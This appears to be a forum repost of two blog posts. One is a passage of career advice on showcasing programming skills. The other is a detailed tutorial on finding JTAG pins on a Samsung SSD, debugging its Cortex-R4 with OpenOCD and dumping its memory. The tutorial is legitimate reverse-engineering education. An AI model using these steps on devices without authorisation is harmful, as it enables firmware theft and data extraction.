write a lot of code and to create small projects – so having something to show shouldn't pose a problem. In the list above I have mentioned a few things that I am using personally, but this is not an exhaustive list in any means! I encourage you to come up with other ideas for documenting your own knowledge and to share then in the comments. The list below contains other items that were suggested under the original blogpost. (by Karton) Take part in open projects (e.g. open source). First, we can demonstrate our knowledge, and second, help develop some interesting projects and gain experience in teamwork (even if it is limited to sending patches the maintainer of the code). (by Karton) Create a portfolio. A collective space where we publish what we have done (by michał) Certificates. After learning something on your own, you can try to certify yourself in that thing – i.e. pass an exam and have a lovely entry in your CV. I once heard that “in the west” some employers are big on certificates (by Gynvael) Take part in various competitions/challenge/hackathons/compos, etc., and it is best to win them. And there is no shortage of such competitions - like different CTFs at conferences, challenges published by different companies, various algorithmic contests, and so on and so forth. The more prestigious the competition, the better. (by myst) Internships for students. “Larger companies also organize a different kind of internships for students that can be held at their premises or remotely during the student year. You can often find out about them in scientific circles or somewhere at the university.. Participating in such internships is also, probably, a good way to document that you are doing “something” ;>.” I'll add that some companies also perform open qualification tests with programming languages and grant internships to people who have performed the best. I encourage you to approach such a test, even if you don’t manage to snatch the internship (because e.g. it is only for higher years and you are a first-year student). (by y) Write and develop an application. A case similar to writing an application I proposed, but with an emphasis on the constant development/maintenance of one program. “Later in the conversation 'Oh, you are the author of this program.. We use it in the company’ You will definitely look good then” (by Mariusz Kędziora) On the blog, make a list of the most important/most interesting entries. “You can sum up in a way, for example, your blog (because the blog itself is a lot for the potential employer/co-worker to browse) – in a collection of the best and most interesting entries in your opinion.”. (by Jurgi) Being active on forums. Employers and headhunters also browse thematic forums. If the user has meaningful posts, then that can arouse their interest. “Similarly, being active in the forums (maybe it is worth adding?). In my case, it worked – it wasn't me who applied – it was the employer that came to me, because he wanted me to write for him.” (by Jurgi) Running workshops, zins, scientific circles, etc. “[...] non-internet activity (conducting literary workshops, running several zins) resulted in me being accepted as an editor of a weekly, even though when I asked, there were no vacancies left.” (by Kele) “Portfolio” of solved tasks on pages with constant challenges (tasks, competitions, etc.). “I have recently received an email from Polish SPOJ with a link to a survey. One of the questions was whether we would like to have a possibility to create a profile that could be shown to the future employer on the site. It's also some form of ‘competition', but a more long-term one.” - to be continued P.S. If you have been learning for a while (a few years) and after reading the above list nothing comes to your minds that you could put in your CV, you might want to stop and think carefully if there isn't anything you should change, adjust or improve in the way you go about learning hacking/programming. Sursa: https://gynvael.coldwind.pl/?lang=en&id=728
-
02 Apr 2020 Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction Background To follow up on my last post about SWD and hardware debugging, I wanted to do a deep dive into JTAG from a reverse-engineering perspective. The previous post received a lot of great feedback and it seems that people are interested in this topic, so I wanted to continue the series and expand upon another hardware debugging mechanism. For those who are unfamiliar, JTAG is a hardware level debugging mechanism that many embedded CPUs utilize, with this post I hope to explain how to approach JTAG from a reverse engineers perspective and provide some practical examples along the way. Goals With this post, I hope to do the following: Explain how JTAG works Demonstrate how to discover and utilize a JTAG port/interface on an unknown target Provide an overview of some of the current OSS tools that can be used to interact with a JTAG interface Utilize JTAG to extract firmware and debug a target Also, before I give an overview, I wanted to point out a few great resources for learning about JTAG Cyphunk’s Embedded Analysis Page FPGA4Fun JTAG Overview Blackbox JTAG Reverse Engineering JTAG Overview JTAG is a hardware interface that was developed to assist developers and testers with low level debugging. JTAG was originally developed for testing integrated circuits and more specifically, sampling IO pins on a target under test. This type of debugging interface allows engineers to test connections on PCBs without needing the probe the physical pin itself. The JTAG interface is controlled via the state machine outlined below: One of the important things to remember about JTAG at this level is that it involves two registers, the instruction register, and the data register. To utilize these registers, the proper states in the above state machine must be entered using the following interface signals: Line Usage TMS This pin is used to navigate and control the JTAG state machine TDI Input pin, used to write data to the target TDO Output pin, Used to read data back out from the target TCK Used to determine when data is sampled for all inputs and outputs TRST (Optional) This pin can be used to reset the state machine to the starting state The state machine is navigated using the TMS and TCK lines, while data is written to or read from via TDI and TDO respectively. TMS is sampled on the rising edge of TCK, meaning that the TMS line must be asserted before TCK is toggled to navigate through the state machine. Data is then shifted into the instruction register (IR) or data register (DR) depending on the state of the JTAG state machine. When an operation is completed (or after the update DR/IR phase) the resulting data can be shifted out of DR by entering the Shift-DR state. With these primitives in place, manufacturers can implement whatever features they wish over JTAG. The JTAG standard treats IR and DR as shift registers, and due to this, multiple targets can be daisy-chained together. In a nutshell, JTAG defines a state machine that is navigated with a minimum of 4 signals. With this state machine in place, end users can write and read from two shift registers, IR and DR. JTAG Registers JTAG utilizes two main registers, the instruction register, and the data register. The instruction register is used to determine what function the JTAG controller is about to carry out such as a memory read, or memory write for example. The data register is then used as an additional input to the instruction register, for the previous example, they may be used to provide an address to read from or write to. These registers can vary in size based on their function. To write to a register one would perform the following steps, we’ll use the IR as an example: Enter Test Logic Reset state (TLR) (This can be done by asserting the TMS line and cycling CLK 5 times) Enter Select IR Scan state Enter Capture IR state Enter Shift IR – This is where we load the data into IR from TDI Enter Exit IR state Enter Update IR state – This stage “latches” the value into IR. Following this, if there were no data registers required, the operation would be performed, and the result (if any) would be loaded into the data register to be shifted out. However, many instructions require a data register to be filled out as well before operating. In that case, once the data register is written to and updated, the operation will be performed and the result can be shifted out of the data register. Some instructions do not require the DR to be loaded, for example, if we had loaded the IDCODE instruction into IR (1110b), this would load the processor’s IDCODE value into the data register for us to then clock out and read it on TDO. To read the result out of TDO, one would navigate to the Shift-DR state, and clock in 32 bits on TDI, this would cause the data in the data register to be shifted out on the TDO line. See the image below for a visual representation of what would happen if one loaded the IR with the IDCODE instruction It’s important to remember, that IR and DR can be thought of as shift registers, meaning that when we update them with new values, the old values are then shifted out on TDO. The JTAG standard defines the following instruction registers: BYPASS This instruction connects TDI and TDO In the Shift DR state, data is transferred from TDI to TDO with a delay of one TCK cycle 0 is loaded into the data register during the Capture DR state This can be used to determine how many devices are in a scan chain IDCODE When loaded the Device Code Id Register is selected as the serial path between TDI and TDO In the Capture-DR state, the 32-bit device ID code is loaded into this shift section In the Shift-DR state, this data is shifted out, least significant bit first Core JTAG Concepts The state machine is navigated with 4 signals: TCK,TMS,TDO and TDI TDI is used to provide input, TDO is used for output Using this state machine data can be shifted into the IR (Shift IR) and the DR (Shift DR) The instruction register (IR) can be thought of as a function, and the data register (DR) can be considered the argument to that function As data is shifted into DR and IR, the previous contents are shifted out on TDO Once data is shifted into these registers, an operation can be performed (entirely dependent on host implementation aside from a few reserved instructions) Data is read out of the target by shifting it onto TDO from the data register in the Shift DR state. So now that we have gone over how JTAG works at a low level, we should talk about why we might care about it, and how this interface can grant access to useful features for reverse engineers. One of the most commonly used applications of the JTAG interface is hardware-level debugging (hence the title of this post). This is implemented by the chip manufacturer, and can vary from chip to chip, however, one of the most common implementations of hardware-level debugging for ARM targets is ARM’s CoreSight Debug Interface. This is the same implementation that we communicated with over SWD in my last post, only, in this case, the Debug Access Port is communicated with over JTAG. The specifics of the JTAG implementation can be found here. Luckily for us, some excellent OSS tools can be used to communicate with these ports - this post will focus on using OpenOCD. OpenOCD takes care of utilizing the JTAG or SWD interface to grant the end-user various primitives that are provided by the debug interface exposed through the CoreSight DAP. The Coresight / DAP architecture is fairly complicated and too much to cover in this (already long) post, so I will potentially save that for another post JTAG for Reverse Engineers It’s extremely important to have a solid understanding of the protocol fundamentals when approaching something like this from a reverse engineer’s perspective. When reverse engineering hardware (or software) you want to have your ground truth covered since there are always infinite unknowns. These next few sections will go over how we can take advantage of our low-level knowledge of these protocols to assist us on our path to gaining access to hardware level debugging via JTAG. The first thing that we need to do is determine the pinout, and if the pins exposed allow access to the JTAG interface. Determining the pinout JTAG signal lines are often grouped together, sometimes (if you’re extremely lucky!) you will see one of the following headers: If you find something like this however, it may not have the exact signal groupings, so we will discuss how to determine a pinout if one assumes it’s used for JTAG. When reverse engineering something like this, you want to start with what you know. Since we know that most manufacturers at least implement IDCODE and BYPASS let’s talk about how we can take advantage of those two instructions. If you have identified what you believe to be a potential JTAG header or pinout, but do not know the pins, we can use the behavior of these two registers to determine the pinout. Since the IDCODE register is typically loaded as the default IR, one can test an assumed pinout by doing the following: Assign roles to potential output pins (TMS, TCK, etc) Enter the Test Logic Reset state Enter the Select DR Scan, Capture DR, Shift DR Clock 32 values on TDI and monitor TDO for a valid IDCODE value Check the IDCODE value that you shifted out if it looks valid congratulations! Otherwise, reassign pins and repeat! In addition to taking advantage of the fact that the IDCODE register is often loaded into the IR by default, we can also utilize the fact that both the IR and DR behave as shift registers, so if we assume a common register length (32 bits often works) we can attempt to brute force the pinout by doing the following: Assign roles to potential output pins (TMS, TCK,etc) Using these assumed values, enter the Test Logic Reset state Enter the Shift IR state Shift in a unique 32-bit value on TDI Continue to shift 1’s on TDI while monitoring for your unique pattern on TDO (be sure to do this as lease 32 times!). If the pattern is discovered, congratulations! Otherwise, choose new assignments for the pins and repeat! Both of these methods are used by the previously mentioned JTAGEnum script, as well as the JTAGULATOR. Determining Instruction Length Once you have determined the pinout of the target, then the real fun can begin. The next step is to then determine the length of the IR / DR. To do this, starting with IR, enter the Shift IR state and flood the chain with 1’s on TDI, using a large number like 1024 or 4096, and then clock in a 0. Once this has been done, simply continue to clock in 1’s on TDI, counting the number of clock cycles that it takes before a 0 appears on TDO. This will tell you the length of the IR. Once you have that, you can enter the Shift DR state and repeat the process to determine the state of the DR. This is something that urjtag does very well. Practical Example: Samsung M.2 SSD The target for this post is going to be a Samsung M.2 SSD that I recently recovered from an older laptop. After looking at the PCB and spotting what could potentially be JTAG headers, I wanted to outline the process from start to finish. Practical Example: Locating JTAG Headers / Determining Pinout As mentioned before JTAG lines are often grouped - so when looking at a new platform from a hardware perspective, looking for pin groupings greater than 5 is always a good start. Luckily for us on this target, there are 9 vias located along the outside of the PCB. Let’s start by examining the voltage levels of these pins with the drive in a normal operating state Pin Voltage Level Usage 1 0.1 V ??? 2 1.8 V ??? 3 0.1 V ??? 4 0.1 V ??? 5 0.1 V ??? 6 0.1 V ??? 7 GND GND 8 1.8 V ??? 9 1.8 V ??? From a first pass - these voltage values don’t tell us anything, so what can we determine based on the information we have? First off, we have a GND which is an easy one to determine by using continuity mode on the multimeter and testing against something like a shield of the USB connector (while the target is unplugged of course!). Next, we have one line at 1.8V, typically one would expect this to be TMS as it is recommended to be held high in most documentation. To determine the pinout, we will use a Raspberry Pi and the JTAGEnum project. This script uses the aforementioned methods to attempt to identify a JTAG pinout. It is also important to note here that the logic levels are at 1.8V so we will need to use a logic level shifter if we’re going to interface to this target. JTAGEnum.sh uses the Raspberry Pi’s GPIO lines to actuate the target interface, in the shell script they include a map of the GPIO values which can be seen below: # define BCM pins (mapped directly to /sys/class/gpio/gpio${pin[N]}) # 5v 5v g 14 15 18 g 23 24 g 25 8 7 1 g 12 g 16 20 21 # 3v 2 3 4 g 17 27 22 3v 10 9 11 g 0 5 6 13 19 26 g Using our table above, we will wire the following GPIOs to the unknown header: SSD Header Pin RPi GPIO 1 2 2 3 3 9 4 10 5 11 6 25 In JTAGenum.sh we will modify the pins variable to be as follows: pins=(9 11 25 2 3 10) pinnames=(pin1 pin2 pin3 pin4 pin5 pin6) Now with the pins wired up, and the logic level shifter in place we can run JTAGenum.sh. Running the script wired up as shown below yields a TON of results, the output can be seen [here]. Luckily for us, it properly identifies two possible configurations which can be seen below: FOUND! ntrst:pin4 (RPi GPIO 2) tck:pin6 (RPi GPIO 10) tms:pin1 (RPi GPIO 9) tdo:pin3 (RPi GPIO 25) tdi:pin2 (RPi GPIO 11) IR length: 4 FOUND! ntrst:pin5 (RPi GPIO 3) tck:pin6 (RPi GPIO 10) tms:pin1 (RPi GPIO 9) tdo:pin3 (RPi GPIO 25) tdi:pin2 (RPi GPIO 11) IR length: 4 Next, the script ran an ID scan. You might notice that a lot of results were generated for this, how do we filter through these? There are a few things that you can do to filter through the results, for example, we probably only have 1-2 devices on the scan chain (CPU and flash) so we can immediately ignore those that have more than 2-3 entries. Next, you can rule out those that have long (more than 4-5) sequences of 1’s or 0’s. Luckily in this list, there is an ID that I have seen before: 0x4ba00477 - this ID is for an ARM Cortex core and I’ve seen it before when attempting to get access to Beaglebone Black. ntrst:pin4 tck:pin6 tms:pin1 tdo:pin3 tdi:pin2 devices: 1 0x4ba00477 ntrst:pin4 tck:pin6 tms:pin1 tdo:pin3 tdi:pin5 devices: 1 0x4ba00477 ntrst:pin5 tck:pin6 tms:pin1 tdo:pin3 tdi:pin2 devices: 1 0x4ba00477 ntrst:pin5 tck:pin6 tms:pin1 tdo:pin3 tdi:pin4 devices: 1 0x4ba00477 You’ll notice that with the IDCODE scan, the value for TDI varies, that is because this method does not rely on TDI at all so it is a guess. Luckily some of these results line up nicely with the pattern scan, so we can now assume that we know the pinout of the JTAG interface! Pin Voltage Level Usage 1 0.1 ??? 2 1.8 ??? 3 0.1 TMS 4 0.1 CLK 5 0.1 TDI 6 0.1 TDO 7 GND GND 8 1.8 ??? 9 1.8 ??? Practical Example: Determining Instruction Length with UrJtag While OpenOCD is excellent for interfacing with DAP controllers and connecting to debugging cores, the UrJTAG project is great for interfacing with JTAG at a low level. We can use this to detect the various DR lengths with their useful discover command. This method uses the same principles mentioned earlier to select an IR then shift a large number of 1’s into DR followed by a 0, then clocking more 1’s until a 0 is read on TDO! UrJTAG can use an rc file located at ~/.jtag/rc mine is as follows pi@raspberrypi:~ $ cat .jtag/rc cable gpio tck=10 tms=9 tdi=11 tdo=25 detect discover Below we can see the result of running UrJTAG with these commands: pi@raspberrypi:~ $ sudo -E jtag UrJTAG 2019.12 # Copyright (C) 2002, 2003 ETC s.r.o. Copyright (C) 2007, 2008, 2009 Kolja Waschk and the respective authors UrJTAG is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. There is no warranty for UrJTAG. warning: UrJTAG may damage your hardware! Type "quit" to exit, "help" for help. Initializing GPIO JTAG Chain IR length: 4 Chain length: 1 Device Id: 01001011101000000000010001110111 (0x4BA00477) Unknown manufacturer! (01000111011) (/usr/local/share/urjtag/MANUFACTURERS) Detecting IR length ... 4 Detecting DR length for IR 1111 ... 1 <-- This is BYPASS! Detecting DR length for IR 0000 ... 1 Detecting DR length for IR 0001 ... 1 Detecting DR length for IR 0010 ... 1 Detecting DR length for IR 0011 ... 1 Detecting DR length for IR 0100 ... 1 Detecting DR length for IR 0101 ... 1 Detecting DR length for IR 0110 ... 1 Detecting DR length for IR 0111 ... 1 Detecting DR length for IR 1000 ... 35 Detecting DR length for IR 1001 ... 1 Detecting DR length for IR 1010 ... 35 Detecting DR length for IR 1011 ... 35 Detecting DR length for IR 1100 ... 1 Detecting DR length for IR 1101 ... 1 Detecting DR length for IR 1110 ... 32 <-- This is IDCODE! I wanted to highlight UrJTAG in this post because it is extremely useful when looking at a target with a completely unknown scan chain, or DAP architecture. Luckily for us, the IDCODE of this target tells us that it is ARM and we will likely be able to utilize the CoreSight DAP, to do this, we will use OpenOCD. If you are looking at a scan chain where you know nothing about it, I typically start with UrJtag just to get a map of all of the registers. The python bindings for UrJTAG also work quite well and can be used to interface with JTAG at a low level. JTAG Debugging via OpenOCD. Since we know the pinout of the JTAG interface on our target, we can now move onto using OpenOCD to communicate with it. I am choosing OpenOCD for this task because it has excellent debugging support for ARM MCUs, particularly the Cortex series which uses CoreSight. The first thing we’ll need to do is choose a hardware adapter, we will use the FT2232H breakout module. JTAG via FT2232H With the pinout understood, we can now attempt to talk to the DAP using OpenOCD. For this we will use an FT2232H adapter, for this post I am using a standard FT2232H breakout board. These boards can be used to interract with multiple hardware level interfaces and have excellent software support. You may recall I’ve used them for things such as SWD as well as dumping SPI flash. Using this board, along with a 3.3V to 1.8V logic level converyer we can wire it up to the target as follows: FT2232H Pin Target CN2-7 TCK CN2-10 TDI CN2-9 TDO CN2-12 TMS Next, we will write the outline of our config file, starting with the variables that we know about the target. source [find target/swj-dp.tcl] # This is using the name on the SoC if { [info exists CHIPNAME] } { set _CHIPNAME $CHIPNAME } else { set _CHIPNAME s4ln045x01 } # This is the TAP ID that we discovered in the previous step if { [info exists CPUTAPID] } { set _CPUTAPID $CPUTAPID } else { set _CPUTAPID 0x4ba00477 } # Set the speed of our adapter adapter_khz 200 # We are indeed using JTAG transport select jtag # We don't have a SRST pin, only TRST it would seem reset_config trst_only # Here we create the JTAG TAP/DAP, defining the location and characteristics of our DAP swj_newdap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.cpu set _TARGETNAME $_CHIPNAME.cpu When we run openocd with this config file, these are the results: wrongbaud@wubuntu:~/blog/samsung-jtag$ sudo openocd -f minimodule.cfg -f config.cfg Open On-Chip Debugger 0.10.0+dev-01040-ge7e681ac (2020-01-27-18:55) Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html Info : auto-selecting first available session transport "jtag". To override use 'transport select <transport>'. Warn : Transport "jtag" was already selected Info : clock speed 200 kHz Info : JTAG tap: s4ln045x01.cpu tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4) Info : Listening on port 6666 for tcl connections Info : Listening on port 4444 for telnet connections Info : JTAG tap: s4ln045x01.cpu tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4) Warn : gdb services need one or more targets defined Now let’s have a look at the DAP, and see if there is any more relevant information in there: > dap info 0 DAP transaction stalled (WAIT) - slowing down DAP transaction stalled (WAIT) - slowing down AP ID register 0x24770002 Type is MEM-AP APB MEM-AP BASE 0x80000000 ROM table in legacy format Component base address 0x80000000 Peripheral ID 0x0000080000 Designer is 0x080, <invalid> Part is 0x0, Unrecognized Component class is 0x1, ROM table MEMTYPE system memory not present: dedicated debug bus ROMTABLE[0x0] = 0x1003 Component base address 0x80001000 Peripheral ID 0x04008bbc14 Designer is 0x4bb, ARM Ltd. Part is 0xc14, Cortex-R4 Debug (Debug Unit) Component class is 0x9, CoreSight component Type is 0x15, Debug Logic, Processor ROMTABLE[0x4] = 0x2003 Component base address 0x80002000 Peripheral ID 0x04008bbc14 Designer is 0x4bb, ARM Ltd. Part is 0xc14, Cortex-R4 Debug (Debug Unit) Component class is 0x9, CoreSight component Type is 0x15, Debug Logic, Processor ROMTABLE[0x8] = 0x3003 Component base address 0x80003000 Peripheral ID 0x04008bbc14 Designer is 0x4bb, ARM Ltd. Part is 0xc14, Cortex-R4 Debug (Debug Unit) Component class is 0x9, CoreSight component Type is 0x15, Debug Logic, Processor ROMTABLE[0xc] = 0x4003 Component base address 0x80004000 Invalid CID 0x00000000 ROMTABLE[0x10] = 0x5003 Component base address 0x80005000 Invalid CID 0x00000000 ROMTABLE[0x14] = 0x6003 Component base address 0x80006000 Invalid CID 0x00000000 ROMTABLE[0x18] = 0x7003 Component base address 0x80007000 Invalid CID 0x00000000 ROMTABLE[0x1c] = 0x8003 Component base address 0x80008000 Invalid CID 0x00000000 ROMTABLE[0x20] = 0x9003 Component base address 0x80009000 Invalid CID 0x00000000 ROMTABLE[0x24] = 0xa003 Component base address 0x8000a000 Invalid CID 0x00000000 ROMTABLE[0x28] = 0xb003 Component base address 0x8000b000 Invalid CID 0x00000000 ROMTABLE[0x2c] = 0xc003 Component base address 0x8000c000 Invalid CID 0x00000000 ROMTABLE[0x30] = 0xd003 Component base address 0x8000d000 Invalid CID 0x00000000 ROMTABLE[0x34] = 0xe003 Component base address 0x8000e000 Invalid CID 0x00000000 ROMTABLE[0x38] = 0xf003 Component base address 0x8000f000 Invalid CID 0x00000000 ROMTABLE[0x3c] = 0x0 End of ROM table The first thing that sticks out is that this is a Cortex R4, with this additional information we can create a target in the config file, which should grant access to the MEM-AP allowing for debugging. This can be done by adding the following line: target create $_TARGETNAME.1 cortex_r4 -endian $_ENDIAN -dap $_CHIPNAME.dap With this additional line, we can try to halt the target via the halt command and read memory via mdw from the OpenOCD prompt: > halt MPIDR not in multiprocessor format target halted in Thumb state due to debug-request, current mode: Supervisor cpsr: 0x80000133 pc: 0x0001abfc D-Cache: disabled, I-Cache: disabled > mdw 0x800000000 10 DAP transaction stalled (WAIT) - slowing down 0x800000000: eafffffe ea000005 ea000006 ea000006 ea00000b e320f000 ea00000e eafffffe 0x800000020: ea0000e3 eafffffe Here we test stepping through the running firmware: > halt MPIDR not in multiprocessor format target halted in ARM state due to debug-request, current mode: Supervisor cpsr: 0x80000113 pc: 0x0000e10c D-Cache: disabled, I-Cache: disabled > step target halted in ARM state due to breakpoint, current mode: Supervisor cpsr: 0x80000113 pc: 0x0000e110 D-Cache: disabled, I-Cache: disabled Success! It appears to be working, and we can single-step through the firmware. Next, let’s use this capability to get some RAM dumps, this page gives an overview of the memory model, so we can use that as a reference. Memory can be dumped to a file with OpenOCD via the dump_image command. > halt MPIDR not in multiprocessor format target halted in ARM state due to debug-request, current mode: Abort cpsr: 0x200001d7 pc: 0x00000048 D-Cache: disabled, I-Cache: disabled Data fault registers DFSR: 00000008, DFAR: 9f7e3000 Instruction fault registers IFSR: 00000000, IFAR: 00000000 > dump_image SDRAM.bin 0x20000000 0xA0000000 > dump_image RAM.bin 0 0xFFFFFFF Finally, let’s take these RAM dumps and load them into GHIDRA to see if they make sense: Excellent, we have some xrefs and the init code looks fairly sane. It also looks like there is some sort of debug menu that is presented over the UART, these are likely pins 8/9 on our pinout! Safe to say that this is a valid RAM dump, and with this, I will finish up this post. Conclusion This was quite a long post - realistically it probably should have been broken up into 2-3 parts. With this post, we learned how JTAG functions at a low level, as well as how to approach JTAG as a reverse engineer. We were also able to get JTAG access to an undocumented target, extract memory, and single-step through the running firmware. There are lots of things left to do here, like determine if the flash chips themselves can be dumped via JTAG, RE the firmware to look for interesting ways to recover data from the drive (I recently discovered that lots of cool work has been done here already!). As always, if you have any questions or comments, please feel free to reach out on twitter. Refs I wanted to mention some awesome work that I found after going through all of this, both of these have already done a lot of what we did in this post today, albeit on slightly different drives. I’m sure that someone on twitter will let me know this so I wanted to link to some excellent previous work that was pointed out to me by some members of the OpenOCD community! https://github.com/thesourcerer8/SSDdiag http://www2.futureware.at/~philipp/ssd/TheMissingManual.pdf Sursa: https://wrongbaud.github.io/jtag-hdd/